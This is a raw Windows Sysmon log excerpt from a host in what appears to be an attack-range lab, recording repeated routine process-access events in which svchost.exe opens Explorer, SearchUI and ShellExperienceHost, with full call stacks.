13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 